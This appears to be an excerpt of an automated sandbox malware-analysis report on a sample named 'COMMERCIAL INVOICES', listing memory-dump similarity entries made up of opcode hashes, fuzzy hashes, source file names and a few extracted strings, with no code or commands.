                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 90611ac34bf6383f5c8a18abebb36ccb23975e35ed9422881dc331e9eb98bab2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0351B2B2D2026A9BDF14EF99D848AAEBBF4AF54610F45412DEA11FB340D3749C01CBE4
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: EXT-
                                                                                                                                                                                                                                      • API String ID: 0-1948896318
                                                                                                                                                                                                                                      • Opcode ID: 6f46c576d9374647672a9c1e1f516cf904997ed03c324d60c8af63c77d475c1e
                                                                                                                                                                                                                                      • Instruction ID: 601c5cacf319fbf8272568415a483fcf3762ad8c29fcca2c5d32acfa80432eac
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f46c576d9374647672a9c1e1f516cf904997ed03c324d60c8af63c77d475c1e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5941B1725283029BD754DB75C8C0B6BFBE8AF98714F45092DFE84E7180E674DA04C7A6
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: BinaryHash
                                                                                                                                                                                                                                      • API String ID: 0-2202222882
                                                                                                                                                                                                                                      • Opcode ID: d1d3dda163e6e456f461fccc14822746fe171b918f725f4ac1896867c7c46b54
                                                                                                                                                                                                                                      • Instruction ID: 507a77d709ae3bd6ce8b73e1fae12d8e1219d6bfda94f790b0d8efd6a0f78a1e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d1d3dda163e6e456f461fccc14822746fe171b918f725f4ac1896867c7c46b54
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6F4153B1D1112DABDF21DA50CC84FEEB77CAB44754F0045A5EB08AB140EB709E99CFA4
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: #
                                                                                                                                                                                                                                      • API String ID: 0-1885708031
                                                                                                                                                                                                                                      • Opcode ID: 23e3405f6bf1e04a2355c9561874a4de3f44ee6f01fd33cb67328d23565f4bb6
                                                                                                                                                                                                                                      • Instruction ID: a4a3914e016f063b36b63868e5b85c574dbdef5ebad854294fa5f90210ec7ba3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 23e3405f6bf1e04a2355c9561874a4de3f44ee6f01fd33cb67328d23565f4bb6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 61312D31A2075A9BEB32DF69C854BEE7BB8DF04704F544028EA41AB282D775E805CB54
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: BinaryName
                                                                                                                                                                                                                                      • API String ID: 0-215506332
                                                                                                                                                                                                                                      • Opcode ID: 2ff6bf62621106b7e8b10988d6ed7420ef4a9eeed8851d551768f3484dd971bc
                                                                                                                                                                                                                                      • Instruction ID: a34509d9c799ecb7ec91d4529b24315e7243ff4c33656f52657e45b2c32a7dd5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2ff6bf62621106b7e8b10988d6ed7420ef4a9eeed8851d551768f3484dd971bc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5A313936921516EFEB15DB58C891EBFBB74EF807A0F014129EA01A7250E7309E10DBE0
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 012C895E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                                                                                                                                      • API String ID: 0-702105204
                                                                                                                                                                                                                                      • Opcode ID: d8d6a27c572c77ce1cf0b9943a9f7e46df1e3ff0fd49d211a44b2e859ddef442
                                                                                                                                                                                                                                      • Instruction ID: d813e14f81a24acce34d8ce0ac6eec217d889a84380896c1d461f8c5f0308351
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d8d6a27c572c77ce1cf0b9943a9f7e46df1e3ff0fd49d211a44b2e859ddef442
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C301F7312702069BE6246F598885BEA7B65EFC5B55F04021CF74156661CB60A880C79A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 88ce91fb1e09d7bea558eeac6e9f61840758f542dcb714b06f74b0de4b13d232
                                                                                                                                                                                                                                      • Instruction ID: 00e62a2a9853839ee16e5b22d82950c21026df022492fd6b2abe55f2d50447d3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 88ce91fb1e09d7bea558eeac6e9f61840758f542dcb714b06f74b0de4b13d232
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5542B471628342CBD725CF68C895A6BBBE9FF98300F88092DFA8797250D770D945CB52
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: dd567fb2bb297b38ff7dc1b9e98fdaf6e025a203bc717004af62d2da2f4afaf7
                                                                                                                                                                                                                                      • Instruction ID: cf23ae350b6fca13ea517bce71e1335160c63561fdee9bf1a26f1124c76f4f15
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dd567fb2bb297b38ff7dc1b9e98fdaf6e025a203bc717004af62d2da2f4afaf7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9C425D75E202198FEB25CF69C881BADBBF5FF48310F158099EA49EB241DB349985CF50
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: c54c41fc2661583ab30d0d7e6b1d1c5805313dee7ea4b751f9bf5a94e03a321e
                                                                                                                                                                                                                                      • Instruction ID: 6d0fdba693745188d34d4007845fa3c999eb7f1ca2d274142def71633a578c25
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c54c41fc2661583ab30d0d7e6b1d1c5805313dee7ea4b751f9bf5a94e03a321e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F4320C70A20746CFEB25CF69C8447BEBBF6BF84700F68411DDA869B284D775A806CB50
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: a3001bb7e49ef8ce8842e67343d2302ab5797f707d3402b1e1ec42bc37256bdf
                                                                                                                                                                                                                                      • Instruction ID: 99a395d61afc6d3277ed821a0cce8da577d0c9dc676bdc5770875bc169b95836
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a3001bb7e49ef8ce8842e67343d2302ab5797f707d3402b1e1ec42bc37256bdf
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC22D2746346628FEB25CF2DC099376BBF1EF45300F888499EA968F286D375D452CB60
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 2d862d8aef747bc50647afea6aabb0572123784e05e285fdca2d0397e1041560
                                                                                                                                                                                                                                      • Instruction ID: d13cbcab0f68c3e76f747898b6d1b4be61271057f2d7beafc8908fac22352039
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2d862d8aef747bc50647afea6aabb0572123784e05e285fdca2d0397e1041560
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1432CF71A21216CFDB29CF68C480BAEBBF1FF49310F148569EA56AB391D770E851CB50
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                                                                                                                                                      • Instruction ID: ade595f0e03d49e4a82906d01b29025542fd749b68386fde8b99ccdc01776a3d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A6B13C71E0061ADFDF19CFADC880AAEBBB5FF48314F248169E914A7358D730A941CB90
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: bff2bed6335dd315dc7ebe426c4fa12189cf5c3089b31009be608e6418f3d492
                                                                                                                                                                                                                                      • Instruction ID: bb2f9fc16871e89f9aff6026db1ac4698f257b8574d3fb78faaf5c3aeeb505a5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bff2bed6335dd315dc7ebe426c4fa12189cf5c3089b31009be608e6418f3d492
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B0918371D10216AFDB15CFA8D894BBEBBB9AF48B10F15426DEB10AB341D774D900DBA0
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 6e36a5d6d6f29275636955a61a96229bc23bf10146e5db3df6c5e831c0511eb8
                                                                                                                                                                                                                                      • Instruction ID: 3ffc6e930019646af66f9e1ab0ef94144e54d44be7e557e7e6117aaa923940af
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e36a5d6d6f29275636955a61a96229bc23bf10146e5db3df6c5e831c0511eb8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B1914771A20213DFEB64DB29D4C1B7EBBA2EF94718F064066EE059B380E634DE41C761
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                                                                                                                                      • Instruction ID: 723f48db2e35f9d2e5317b57da42af6f1731f318f7ec93c84d1393945e29c968
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 11818F31A107099FDF1ACF9CD8A0AAEBBF6BF84314F198569D9169B384D734E901CB50
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: ca2e442e0697e4cb50e688d14b2c94b9e3243293d1b03791e846bd3bcf293300
                                                                                                                                                                                                                                      • Instruction ID: faf482d862e9d638bf8692ad8e0bad8d55779564b53eb391a9afa68f7423dd71
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ca2e442e0697e4cb50e688d14b2c94b9e3243293d1b03791e846bd3bcf293300
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4A816C71A1060AAFDB25DFA9C880AEFBBFAFF48354F114429E655A7250D730AC45CB60
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 4fdc8cf21908bb814bd0eb08aff3157a7db65459138297fb59d942754c3682c2
                                                                                                                                                                                                                                      • Instruction ID: a5486907fb34e2a31c63ba9878e65270000332966c6c05ecdb739d0407cb2e7b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4fdc8cf21908bb814bd0eb08aff3157a7db65459138297fb59d942754c3682c2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AC71F275C2462ADFCB29CF68D4917BEBBB8FF58710F14411AEA41AB350E3749910CBA0
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: e13cace66fb49d3843b84e3ba14a33a371783a155119f30cd2f1df987a37dc00
                                                                                                                                                                                                                                      • Instruction ID: ad24d3136d8153a378941c48c401f4ea7a2f9b5089868200a11809744272efcb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e13cace66fb49d3843b84e3ba14a33a371783a155119f30cd2f1df987a37dc00
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 587192B1A20246EFDB20EF59D955AABFBF8FF90300F00416EE70497258C7B18A44CB58
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 9fd7685f81e0b69aae6adde92b38e98bb51b5e31a1c1b14124142c8151eeb3da
                                                                                                                                                                                                                                      • Instruction ID: c2281be0afcd239caf7de912867b2d7909a4f34b744532b207b5179710badd84
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9fd7685f81e0b69aae6adde92b38e98bb51b5e31a1c1b14124142c8151eeb3da
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D271B072624242CFD355DF28C480B2AB7E5FF84710F0985AAED958B392DB74DC46CBA1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 5e52ce35a3b04ed8b2a0d181a7b104cf91bde8db25401b717794932992d35bcc
                                                                                                                                                                                                                                      • Instruction ID: 27c6235a01063f91002f7730e956a86020be9c4271a0dc19068596cea2801158
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e52ce35a3b04ed8b2a0d181a7b104cf91bde8db25401b717794932992d35bcc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E25191B1910216EFCB20DF69C8809AEBBB9FF48B54F154619D649A7304D730AE51CBD0
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: b6fd6d57ee051594c2a9f0feb800f8d0b7786a2fdf764444d278c4d349297372
                                                                                                                                                                                                                                      • Instruction ID: 83f28690af09f82a0521add8cc81eb12a3a1190aaf8c52b16da102ab89f8ec99
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b6fd6d57ee051594c2a9f0feb800f8d0b7786a2fdf764444d278c4d349297372
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D7411671B61606DFDB29EF68A8C2B7F3769EB58758F04002CEE02DB241D7F198508754
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                                                                                                                                      • Instruction ID: 6bf1f34f4420debaaccd0b4094841c29d4b21e4a80398e20707fad336b45ebd2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8041FA726107169FD726CF28D9A0A7AB7E9FF80318B05462EE912876C0EB30ED54C7D0
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 5d03d01717317336e5abe618b587228d223db2803fccd733e933d4cd24e048db
                                                                                                                                                                                                                                      • Instruction ID: b3625902877345f89478bde7ba0275f1bdb5742247f6f3ecf2297c170ba1c9e3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5d03d01717317336e5abe618b587228d223db2803fccd733e933d4cd24e048db
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D641CC3292021ADBDB14DF98C480AEFB7B4BF4A700F14812AF915E7240D7749C49CBA8
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 9cad6594e1d1ac549f77d8d01147b6cfd4a1f846ffc067ac890b684245447013
                                                                                                                                                                                                                                      • Instruction ID: 26e3e5f85a5402646d5f8f730cb9654c940e4322fb3b158ba2e3094ef72187d6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9cad6594e1d1ac549f77d8d01147b6cfd4a1f846ffc067ac890b684245447013
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F641C4B1220702DFD725DF28C880A2B77EDFF58314F014829EA57C7695DB74E4848B50
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                                                                                                                                      • Instruction ID: 5e57a0608f5ea235d9a0bb5f00452cb9ea20ef9c3eb0364f8caadc7b0f8b7a2a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0517B35A1021ACFCB15CF9CC580AADF7B2FF84750F2481A9DA15A7351D774AE41CB90
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: eccb0cbd2b48b915c67df4b8ab0d2e1f8b1c75b8245d0467ae8ed5d3b9ad72c6
                                                                                                                                                                                                                                      • Instruction ID: 81bec5e1aedb45146727cbac11b2b0b8aee9e783b32c66bf8aef9aa286656941
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eccb0cbd2b48b915c67df4b8ab0d2e1f8b1c75b8245d0467ae8ed5d3b9ad72c6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DB512AB0920217EFDB29CB28CC41BB8BBB1FF16314F0442A9D629AB2C1D7745981CF44
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 3acca1060177d1f63cb0dc581e58169abc28fd7072266ac93b449a1d14556856
                                                                                                                                                                                                                                      • Instruction ID: 6d81f74abef20918adf1743cbdc9c3f11a6f4df173a9dd45d82bce06b0b7bdf4
